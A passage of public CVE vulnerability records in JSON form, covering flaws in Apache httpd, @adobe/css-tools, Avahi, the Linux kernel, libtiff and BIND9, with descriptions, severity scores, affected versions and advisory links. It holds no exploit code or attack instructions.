"f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://httpd.apache.org/security/vulnerabilities_24.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TI3V2YCEUM65QDYPGGNUZ7UONIM5OEXC/" }, { "url": "https://security.netapp.com/advisory/ntap-20231027-0011/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZJTT5TEFNSBWVMKCLS6EZ7PI6EJYBCO/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFDNHDH4VLFGDPY6MEZV2RO5N5FLFONW/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00013.html" } ], "source": { "discovery": "UNKNOWN" }, "timeline": [ { "lang": "en", "time": "2023-04-04T00:00:00.000Z", "value": "Reported to security team" } ], "title": "Apache HTTP Server: mod_macro buffer over-read", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "assignerShortName": "apache", "cveId": "CVE-2023-31122", "datePublished": "2023-10-23T06:51:59.705Z", "dateReserved": "2023-04-24T17:37:59.263Z", "dateUpdated": "2024-09-17T13:47:23.424Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-26364
Vulnerability from cvelistv5
Published
2023-11-17 13:38
Modified
2024-08-29 14:12
Severity ?
EPSS score ?
Summary
@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS. Exploitation of this issue does not require user interaction or privileges.
References
▼ | URL | Tags |
---|---|---|
https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg | vendor-advisory |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Adobe | Not a product |
Version: 0 ≤ 4.3.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:46:24.568Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-26364", "options": [ { "Exploitation": "poc" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T14:10:03.698524Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:12:36.686Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "Not a product", "vendor": "Adobe", "versions": [ { "lessThanOrEqual": "4.3.0", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "datePublic": "2023-08-29T17:00:00.000Z", "descriptions": [ { "lang": "en", "value": "@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS. Exploitation of this issue does not require user interaction or privileges." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "confidentialityRequirement": "NOT_DEFINED", "environmentalScore": 5.3, "environmentalSeverity": "MEDIUM", "exploitCodeMaturity": "NOT_DEFINED", "integrityImpact": "NONE", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "LOW", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "NOT_DEFINED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "remediationLevel": "NOT_DEFINED", "reportConfidence": "NOT_DEFINED", "scope": "UNCHANGED", "temporalScore": 5.3, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "Improper Input Validation (CWE-20)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-17T13:38:41.278Z", "orgId": "078d4453-3bcd-4900-85e6-15281da43538", "shortName": "adobe" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg" } ], "source": { "discovery": "EXTERNAL" }, "title": "Denial of Service of regular expression in package @adobe/css-tools" } }, "cveMetadata": { "assignerOrgId": "078d4453-3bcd-4900-85e6-15281da43538", "assignerShortName": "adobe", "cveId": "CVE-2023-26364", "datePublished": "2023-11-17T13:38:41.278Z", "dateReserved": "2023-02-22T19:47:52.379Z", "dateUpdated": "2024-08-29T14:12:36.686Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38469
Vulnerability from cvelistv5
Published
2023-11-02 14:49
Modified
2024-08-29 14:21
Severity ?
EPSS score ?
Summary
A vulnerability was found in Avahi, where a reachable assertion exists in avahi_dns_packet_append_record.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-38469 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2191687 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | avahi | |||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:39:13.526Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38469" }, { "name": "RHBZ#2191687", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191687" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38469", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:53:35.768386Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:21:27.532Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "avahi", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "avahi", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-04-26T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Avahi, where a reachable assertion exists in avahi_dns_packet_append_record." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-02T14:49:26.283Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38469" }, { "name": "RHBZ#2191687", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191687" } ], "timeline": [ { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Made public." } ], "title": "Reachable assertion in avahi_dns_packet_append_record", "x_redhatCweChain": "CWE-617: Reachable Assertion" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-38469", "datePublished": "2023-11-02T14:49:26.283Z", "dateReserved": "2023-07-18T09:48:04.752Z", "dateUpdated": "2024-08-29T14:21:27.532Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26602
Vulnerability from cvelistv5
Published
2024-02-24 14:56
Modified
2024-12-19 08:43
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/membarrier: reduce the ability to hammer on sys_membarrier
On some systems, sys_membarrier can be very expensive, causing overall
slowdowns for everything. So put a lock on the path in order to
serialize the accesses to prevent the ability for this to be called at
too high of a frequency and saturate the machine.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26602", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-29T16:20:03.636502Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:48:51.858Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.594Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "kernel/sched/membarrier.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "3cd139875e9a7688b3fc715264032620812a5fa3", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "2441a64070b85c14eecc3728cc87e883f953f265", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "db896bbe4a9c67cee377e5f6a743350d3ae4acf6", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "50fb4e17df319bb33be6f14e2a856950c1577dee", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "24ec7504a08a67247fbe798d1de995208a8c128a", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "b6a2a9cbb67545c825ec95f06adb7ff300a2ad71", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "c5b2063c65d05e79fad8029324581d86cfba7eea", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" }, { "lessThan": "944d5fe50f3f03daacfea16300e656a1691c4a23", "status": "affected", "version": "22e4ebb975822833b083533035233d128b30e98f", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "kernel/sched/membarrier.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.14" }, { "lessThan": "4.14", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.307", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.269", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.210", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.149", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/membarrier: reduce the ability to hammer on sys_membarrier\n\nOn some systems, sys_membarrier can be very expensive, causing overall\nslowdowns for everything. So put a lock on the path in order to\nserialize the accesses to prevent the ability for this to be called at\ntoo high of a frequency and saturate the machine." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:43:20.951Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3" }, { "url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265" }, { "url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6" }, { "url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee" }, { "url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a" }, { "url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71" }, { "url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea" }, { "url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23" } ], "title": "sched/membarrier: reduce the ability to hammer on sys_membarrier", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26602", "datePublished": "2024-02-24T14:56:56.992Z", "dateReserved": "2024-02-19T14:20:24.128Z", "dateUpdated": "2024-12-19T08:43:20.951Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40090
Vulnerability from cvelistv5
Published
2023-08-22 00:00
Modified
2024-10-03 14:40
Severity ?
EPSS score ?
Summary
An issue was discovered in function TIFFReadDirectory libtiff before 4.4.0 allows attackers to cause a denial of service via crafted TIFF file.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:14:39.758Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://gitlab.com/libtiff/libtiff/-/issues/455" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/386" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2022-40090", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-03T14:40:16.007774Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-03T14:40:47.985Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in function TIFFReadDirectory libtiff before 4.4.0 allows attackers to cause a denial of service via crafted TIFF file." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-08-22T15:44:48.778000", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://gitlab.com/libtiff/libtiff/-/issues/455" }, { "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/386" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-40090", "datePublished": "2023-08-22T00:00:00", "dateReserved": "2022-09-06T00:00:00", "dateUpdated": "2024-10-03T14:40:47.985Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-25742
Vulnerability from cvelistv5
Published
Modified
2024-08-16 16:22
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T23:52:05.760Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2024-25742", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-20T14:09:31.331826Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-16T16:22:27.400Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-17T21:19:48.853193", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" }, { "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2024-25742", "dateUpdated": "2024-08-16T16:22:27.400Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2795
Vulnerability from cvelistv5
Published
2022-09-21 10:15
Modified
2024-11-29 12:04
Severity ?
EPSS score ?
Summary
By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver's performance, effectively denying legitimate clients access to the DNS resolution service.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | ISC | BIND9 |
Version: Open Source Branches 9.0 through 9.16 9.0.0 through versions before 9.16.33 Version: Open Source Branch 9.18 9.18.0 through versions before 9.18.7 Version: Supported Preview Branches 9.9-S through 9.11-S 9.9.3-S1 through versions up to and including 9.11.37-S1 Version: Supported Preview Branch 9.16-S 9.16.8-S1 through versions before 9.16.33-S1 Version: Development Branch 9.19 9.19.0 through versions before 9.19.5 |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:isc:bind:9.0.0:-:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "bind", "vendor": "isc", "versions": [ { "lessThanOrEqual": "9.16.32", "status": "affected", "version": "9.0.0", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:isc:bind:9.9.3:s1:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "bind", "vendor": "isc", "versions": [ { "lessThan": "9.11.37", "status": "affected", "version": "9.9.3", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:isc:bind:9.16.8:s1:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "bind", "vendor": "isc", "versions": [ { "lessThan": "9.16.32", "status": "affected", "version": "9.16.8", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:isc:bind:9.19.0:*:*:*:-:*:*:*" ], "defaultStatus": "unknown", "product": "bind", "vendor": "isc", "versions": [ { "lessThan": "9.19.4", "status": "affected", "version": "9.19.0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2022-2795", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-12T17:20:53.564264Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-20T19:41:53.934Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-11-29T12:04:33.614Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2022-2795" }, { "name": "[oss-security] 20220921 ISC has disclosed six vulnerabilities in BIND (CVE-2022-2795, CVE-2022-2881, CVE-2022-2906, CVE-2022-3080, CVE-2022-38177, CVE-2022-38178)", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/3" }, { "name": "DSA-5235", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5235" }, { "name": "FEDORA-2022-ef038365de", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CV4GQWBPF7Y52J2FA24U6UMHQAOXZEF7/" }, { "name": "FEDORA-2022-8268735e06", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRHB6J4Z7BKH4HPEKG5D35QGRD6ANNMT/" }, { "name": "FEDORA-2022-b197d64471", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZJQNUASODNVAWZV6STKG5SD6XIJ446S/" }, { "name": "[debian-lts-announce] 20221005 [SECURITY] [DLA 3138-1] bind9 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00007.html" }, { "name": "GLSA-202210-25", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202210-25" }, { "url": "https://security.netapp.com/advisory/ntap-20241129-0002/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "BIND9", "vendor": "ISC", "versions": [ { "status": "affected", "version": "Open Source Branches 9.0 through 9.16 9.0.0 through versions before 9.16.33" }, { "status": "affected", "version": "Open Source Branch 9.18 9.18.0 through versions before 9.18.7" }, { "status": "affected", "version": "Supported Preview Branches 9.9-S through 9.11-S 9.9.3-S1 through versions up to and including 9.11.37-S1" }, { "status": "affected", "version": "Supported Preview Branch 9.16-S 9.16.8-S1 through versions before 9.16.33-S1" }, { "status": "affected", "version": "Development Branch 9.19 9.19.0 through versions before 9.19.5" } ] } ], "credits": [ { "lang": "en", "value": "ISC would like to thank Yehuda Afek from Tel-Aviv University and Anat Bremler-Barr \u0026 Shani Stajnrod from Reichman University for bringing this vulnerability to our attention." } ], "datePublic": "2022-09-21T00:00:00", "descriptions": [ { "lang": "en", "value": "By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver\u0027s performance, effectively denying legitimate clients access to the DNS resolution service." } ], "exploits": [ { "lang": "en", "value": "We are not aware of any active exploits." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "In BIND 9.0.0 -\u003e 9.16.32, 9.18.0 -\u003e 9.18.6, versions 9.9.3-S1 -\u003e 9.11.37-S1, 9.16.8-S1 -\u003e 9.16.32-S1 of the BIND Supported Preview Edition, and versions 9.19.0 -\u003e 9.19.4 of the BIND 9.19 development branch, a flaw in resolver code can cause named to spend excessive amounts of time on processing large delegations.", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-31T00:00:00", "orgId": "404fd4d2-a609-4245-b543-2c944a302a22", "shortName": "isc" }, "references": [ { "url": "https://kb.isc.org/docs/cve-2022-2795" }, { "name": "[oss-security] 20220921 ISC has disclosed six vulnerabilities in BIND (CVE-2022-2795, CVE-2022-2881, CVE-2022-2906, CVE-2022-3080, CVE-2022-38177, CVE-2022-38178)", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/3" }, { "name": "DSA-5235", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5235" }, { "name": "FEDORA-2022-ef038365de", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CV4GQWBPF7Y52J2FA24U6UMHQAOXZEF7/" }, { "name": "FEDORA-2022-8268735e06", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRHB6J4Z7BKH4HPEKG5D35QGRD6ANNMT/" }, { "name": "FEDORA-2022-b197d64471", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZJQNUASODNVAWZV6STKG5SD6XIJ446S/" }, { "name": "[debian-lts-announce] 20221005 [SECURITY] [DLA 